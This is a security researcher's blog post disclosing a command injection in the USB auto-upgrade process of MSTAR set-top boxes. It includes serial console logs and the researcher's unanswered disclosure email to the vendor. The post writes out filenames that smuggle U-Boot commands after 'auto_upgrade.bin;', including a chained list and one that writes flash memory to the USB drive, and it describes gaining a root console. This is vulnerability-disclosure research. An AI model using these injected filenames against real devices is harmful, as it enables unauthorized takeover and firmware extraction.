Ivan Marković
Security consultant and researcher
Long experience in designing and implementation of security solutions, mainly oriented on web, mobile and embedded applications. Author of penetration testing tools, recognized by OWASP organization and BackTrack Linux distribution. Researching work includes discovery of vulnerabilities of numeral applications and services, and for these, author received public apreciations by Microsoft Company..
Command injections via USB upgrade in MSTAR Set-Top box products
27.04.2018
While I was working on diagnostic device for some of my clients I found command injections in MSTAR Set-Top box products. Diagnostic device is not specially target this vendor but we used it in development phase and for testing. Vulnerable functionality is in automatic USB upgrade process. It is possible to inject additional commands via malicious files names.
For example, to upgrade your Set-Top box, you just need to put firmware file on USB drive with filename "auto_upgrade.bin" and after you insert it and restart device, it will be automaticaly upgraded. This fuctionality can be also exploited by inserting additional commands in filename.
One of the first that I try is "auto_upgrade.bin;help" and we can check that command injection works from serial console output:
2017-02-13 18:48:51 U-Boot 1.1.6 (Aug 22 2016 - 16:45:10) 2017-02-13 18:48:51 2017-02-13 18:48:51 Board: MSTAR KRITI (CPU Speed 576 MHz) 2017-02-13 18:48:51 DRAM: 64 X 0 MBytes 2017-02-13 18:48:51 U-Boot is running at DRAM 0x87610000 2017-02-13 18:48:51 Module: USB FAT FLASH SPI LOGO OSD ENV=SERIAL 2017-02-13 18:48:51 Flash is detected (0x0C02, 0xC8, 0x40, 0x16) 2017-02-13 18:48:51 In: serial 2017-02-13 18:48:51 Out: serial 2017-02-13 18:48:51 Err: serial 2017-02-13 18:48:51 MSVC00B000100100208768TH0000000T 2017-02-13 18:48:51 MDrv_PNL_Init u32PnlRiuBaseAddr = BF200000 2017-02-13 18:48:51 MDrv_PNL_Init u32PMRiuBaseAddr = BF000000 2017-02-13 18:48:52 Panel Library mismatch(03), please update to version 04 2017-02-13 18:48:52 [_MDrv_PNL_Init_LPLL][305]pstPanelInitData->u16Width=1920, pstPanelInitData->u16Height=1080 2017-02-13 18:48:52 [_MDrv_PNL_Init_LPLL][307]u16HTotal=2640,u16VTotal=1125,pstPanelInitData->u16HTotal=2640,pstPanelInitData->u16VTotal=1125, u16DefaultVFreq=500 2017-02-13 18:48:52 [_MDrv_PNL_Init_Output_Dclk][350]pstPanelInitData->u16Width=1920, pstPanelInitData->u16Height=1080 2017-02-13 18:48:52 [_MDrv_PNL_Init_Output_Dclk][352]u16HTotal=2640,u16VTotal=1125,pstPanelInitData->u16HTotal=2640,pstPanelInitData->u16VTotal=1125, u16DefaultVFreq=500 2017-02-13 18:48:52 [XC,Version][0;36m 00442327 2017-02-13 18:48:52 [mno need to patch 2017-02-13 18:48:52 DAC eTiming =6 2017-02-13 18:48:52 HDMITx eTiming =7 2017-02-13 18:48:52 HDMITx eTiming =7 2017-02-13 18:48:52 Create Dolby single part name task failed!! 2017-02-13 18:48:52 [Hal_VE_EnableDI][1430] bEnable = 0, bIsDNR2VE = 0 2017-02-13 18:48:52 u32ReadBuffVirAddr = A0000000, u32IntBuffVirAddr = A0100000, u32OutBuffVirAddr = A0730000 2017-02-13 18:48:52 verJPD_SetStatus >>>>>>>>>>> w:720, h:576, p:720 2017-02-13 18:48:52 2017-02-13 18:48:52 [GOP3, PID 0, TID 0x-1][Driver Version]: 0089, BuildNum: 0002, ChangeList: 00524916 2017-02-13 18:48:52 keypad_pressed is [0] 2017-02-13 18:48:52 ir_pressed is [0] 2017-02-13 18:48:52 Hit any key to stop autoboot: 0 2017-02-13 18:48:52 Check USB port[0]: 2017-02-13 18:48:53 Host type:2 2017-02-13 18:48:53 scanning bus for devices... 1 USB Device(s) found 2017-02-13 18:48:53 scanning bus for storage devices... bulk max packet size: ep 200 ep2 200 2017-02-13 18:48:53 usb_stor_Bulk_max_lun: 0 2017-02-13 18:48:53 1 Storage Device(s) found 2017-02-13 18:48:53 reading auto_upgrade.bin 2017-02-13 18:48:53 2017-02-13 18:48:53 ** Unable to read "auto_upgrade.bin" from usb 0:1 ** 2017-02-13 18:48:53 cmd fatload usb 0 80000000 auto_upgrade.bin 1 failed 2017-02-13 18:48:53 ? - alias for 'help' 2017-02-13 18:48:53 2017-02-13 18:48:53 do Lzma for compress image 2017-02-13 18:48:53 2017-02-13 18:48:53 autoboot - Continue auto-boot flow 2017-02-13 18:48:53 2017-02-13 18:48:53 base - print or set address offset 2017-02-13 18:48:53 2017-02-13 18:48:53 bdinfo - print Board Info structure 2017-02-13 18:48:53 2017-02-13 18:48:53 boot_logo - Logo display ...
You can also chain your commands:
"auto_upgrade.bin;help;bdinfo;boot_logo;coninfo;fatinfo;printenv;version;.bin"
... 2017-02-13 18:49:57 ustar - update kernal & root file system automatically by script file 2017-02-13 18:49:57 2017-02-13 18:49:57 version - print monitor version 2017-02-13 18:49:57 2017-02-13 18:49:57 boot_params = 0x877958E0 2017-02-13 18:49:57 memstart = 0x80000000 2017-02-13 18:49:57 memsize = 0x08000000 2017-02-13 18:49:57 flashstart = 0xBFC00000 2017-02-13 18:49:57 flashsize = 0x00800000 2017-02-13 18:49:57 flashoffset = 0x00000000 2017-02-13 18:49:57 ethaddr = 2017-02-13 18:49:57 00:00:00:00:00:00 2017-02-13 18:49:57 ip_addr = 2017-02-13 18:49:57 0.0.0.0 2017-02-13 18:49:57 2017-02-13 18:49:57 baudrate = 0 bps 2017-02-13 18:49:57 Usage: 2017-02-13 18:49:57 boot_logo - Logo display 2017-02-13 18:49:57 2017-02-13 18:49:57 List of available devices: 2017-02-13 18:49:57 2017-02-13 18:49:57 serial 80000003 SIO stdin stdout stderr 2017-02-13 18:49:57 usage: fatinfo2017-02-13 18:49:57 bootdelay=0 2017-02-13 18:49:57 baudrate=115200 2017-02-13 18:49:57 preboot=echo;echo Type "help" for more commands. 2017-02-13 18:49:57 MS_BOARD=BD_MST204A_D01A 2017-02-13 18:49:57 logo_cmd=boot_logo 0 0 1 1 2017-02-13 18:49:57 OAD_IN_MBOOT=1 2017-02-13 18:49:57 info_exchange=spi 2017-02-13 18:49:57 CUSTOMER_OUI=0x226D 2017-02-13 18:49:57 AP_SW_MODEL=0x0208 2017-02-13 18:49:57 HW_MODEL=0x2210 2017-02-13 18:49:57 HW_VERSION=0x0001 2017-02-13 18:49:57 CHIP_VERSION=U03 2017-02-13 18:49:58 BOARD_TYPE_SEL=0x0CFF 2017-02-13 18:49:58 BUILDCL=0xEAF49 2017-02-13 18:49:58 bootcmd=spi_rdc 0x80b00000 0x7001c 0x2ac77e; LzmaDec 0x80b00000 0x2ac77e 0x80000180 0x81000000; go 0x80000224; 2017-02-13 18:49:58 AP_SW_VERSION=0x0001 2017-02-13 18:49:58 usb_complete=0 2017-02-13 18:49:58 filesize=4 2017-02-13 18:49:58 panel_cmd=set_paneltype 12 2017-02-13 18:49:58 OAD_NEED_UPGRADE=0 2017-02-13 18:49:58 OAD_NEED_SCAN=0 2017-02-13 18:49:58 USBUpdateFlag=0 2017-02-13 18:49:58 usb_upgrade=1 2017-02-13 18:49:58 usb_upgrade_port=0 2017-02-13 18:49:58 partno=1 2017-02-13 18:49:58 usb_upgrade_path=auto_upgrade.bin;help;bdinfo;boot_logo;coninfo;fatinfo;printenv;version;.bin 2017-02-13 18:49:58 stdin=serial 2017-02-13 18:49:58 stdout=serial 2017-02-13 18:49:58 stderr=serial 2017-02-13 18:49:58 2017-02-13 18:49:58 Environment size: 703/65532 bytes 2017-02-13 18:49:58 2017-02-13 18:49:58 U-Boot 1.1.6 (Aug 22 2016 - 16:45:10) 2017-02-13 18:49:58 start get ...
Serial console doesn't accept any input because "bootdelay=0", but with command injection in USB upgrade process we can find a way to configure U-Boot and get a root:
2017-02-13 19:11:25 BOOTSPI 2017-02-13 19:11:25 BIST0_OK 2017-02-13 19:11:25 _OK!decomp 2017-02-13 19:11:25 _done 2017-02-13 19:11:25 done 2017-02-13 19:11:25 2017-02-13 19:11:25 Hello U-Boot 2017-02-13 19:11:25 2017-02-13 19:11:25 U-Boot 1.1.6 (Aug 22 2016 - 16:45:10) 2017-02-13 19:11:25 2017-02-13 19:11:25 Board: MSTAR KRITI (CPU Speed 576 MHz) 2017-02-13 19:11:25 DRAM: 64 X 0 MBytes 2017-02-13 19:11:25 U-Boot is running at DRAM 0x87610000 2017-02-13 19:11:26 Module: USB FAT FLASH SPI LOGO OSD ENV=SERIAL 2017-02-13 19:11:26 Flash is detected (0x0C02, 0xC8, 0x40, 0x16) 2017-02-13 19:11:26 In: serial 2017-02-13 19:11:26 Out: serial 2017-02-13 19:11:26 Err: serial ... 2017-02-13 19:11:26 keypad_pressed is [0] 2017-02-13 19:11:26 ir_pressed is [0] ... 2017-02-13 19:11:26 << MStar >># ...
I also try to contact vendor about this issue, but I didn't receive response:
To: contact_europe@mstarsemi.com, security-alert@mstarsemi.com, secure@mstarsemi.com, security@mstarsemi.com, support@mstarsemi.com, info@mstarsemi.com From: IMSubject: Command injection in Set-Top Box USB upgrade procedure Message-ID: <8a9e4502-1963-1bae-3aeb-88e5a16699e4@security-net.biz> Date: Fri, 27 Oct 2017 15:06:19 +0200 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Thunderbird/52.4.0 MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: 7bit Content-Language: en-US Hello, I'm working on some diagnostic device and during the testing I found command injection in some of yours products. It is possible to inject additional commands via malicious files names, for example: "auto_upgrade.bin;fatwrite usb 0 0xBFC00000 backup.bin 0x400000;" I will publish this findings in my research paper about device that I'm working on. Please contact me if you want to make coordinated disclosure or if you need more details. Best regards, Ivan Markovic https://security-net.biz/
You can download more serial console dump here: CoolTerm-Capture-2017-02-13.txt
GitHub: Command injections via USB upgrade in MSTAR Set Top box